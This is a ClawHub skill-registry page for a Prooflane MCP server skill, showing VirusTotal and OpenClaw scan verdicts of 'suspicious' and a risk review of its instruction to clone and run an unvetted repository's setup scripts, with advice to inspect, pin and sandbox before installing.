ClawHub
Skill flagged — suspicious patterns detected

ClawHub Security flagged this skill as suspicious. Review the scan results before using.

Prooflane MCP Skill

v0.1.0

Clone, install, configure, and run Prooflane's repo-native MCP server locally for evaluation and verification without published package registry dependencies.

0· 44·0 current·0 all-time
byYifeng[Terry] Yu@xiaojiou176
MIT-0
Download zip
LicenseMIT-0 · Free to use, modify, and redistribute. No attribution required.
Security Scan
Capability signals
Requires OAuth token
These labels describe what authority the skill may exercise. They are separate from suspicious or malicious moderation verdicts.
VirusTotalVirusTotal
Suspicious
View report →
OpenClawOpenClaw
Suspicious
medium confidence
Purpose & Capability
Name, description, and runtime instructions align: the skill is an instruction-only scaffold to clone, install, configure, and run a repo-native MCP server. Required tools (git, Node.js, pnpm, Python) and the commands shown are consistent with that purpose. However, the canonical repo is hosted under an apparently personal/unknown GitHub account (xiaojiou176-open), which reduces provenance confidence.
!
Instruction Scope
SKILL.md explicitly instructs running remote install and runtime scripts from the cloned repo (./scripts/setup.sh, pnpm mcp:start and other pnpm tasks). Those commands will execute code that lives in the external repository; the skill provides no packaged code to inspect and does not sandbox or limit what those scripts do. This is expected for the stated goal but is a scope risk because arbitrary code execution is required.
Install Mechanism
There is no install spec in the skill packet (instruction-only), which is lower automation risk. However, the install path requires cloning a third-party GitHub repository and running its setup/start scripts. Downloading and executing code from an external repo is higher risk than a purely local or vetted package install — verify the repo and scripts first.
Credentials
The skill does not request any secrets or environment variables in the manifest. The documented env vars (UIQ_MCP_API_BASE_URL, UIQ_MCP_TOOL_GROUPS, UIQ_MCP_PERFECT_MODE, and optionally AUTOMATION_API_TOKEN) are reasonable and relevant to running a local MCP server. AUTOMATION_API_TOKEN is optional and only needed if the server exposes token-protected HTTP APIs.
Persistence & Privilege
The skill is not always-enabled, does not require platform-level privileges, and is instruction-only (it does not persist credentials or modify other skills). Autonomous invocation remains possible (default), but that is the platform norm and not by itself a reason to flag.
What to consider before installing
This packet is coherent for its stated purpose, but before you run anything: (1) inspect the upstream repository and the contents of ./scripts/setup.sh and any pnpm scripts referenced (pnpm mcp:start, mcp:check, etc.) to check for unexpected network calls, remote downloads, or privileged operations; (2) prefer cloning a specific commit/tag (pin the repo) rather than the default branch; (3) run the setup and server inside an isolated environment (VM or disposable container) and not on production hosts; (4) avoid supplying any sensitive credentials or tokens unless you audited how they are used; (5) if you need higher assurance, ask the publisher to provide a signed release, a verified organization repository, or a published package on a trusted registry so you can avoid running unreviewed repository scripts. If you can provide the contents of the repo (or the specific scripts referenced), I can re-evaluate with higher confidence.
!
references/OPENCLAW_MCP_CONFIG.json:11
Install source points to URL shortener or raw IP.
!
references/OPENHANDS_MCP_CONFIG.json:10
Install source points to URL shortener or raw IP.
About static analysis
These patterns were detected by automated regex scanning. They may be normal for skills that integrate with external APIs. Check the VirusTotal and OpenClaw results above for context-aware analysis.

Like a lobster shell, security has layers — review code before you run it.

automationvk97fw84j3w2bng5rvyts3v0rxs84h73platestvk97fw84j3w2bng5rvyts3v0rxs84h73pmcpvk97fw84j3w2bng5rvyts3v0rxs84h73pproofvk97fw84j3w2bng5rvyts3v0rxs84h73pprooflanevk97fw84j3w2bng5rvyts3v0rxs84h73previewvk97fw84j3w2bng5rvyts3v0rxs84h73p

License

MIT-0
Free to use, modify, and redistribute. No attribution required.
Termshttps://spdx.org/licenses/MIT-0.html

Comments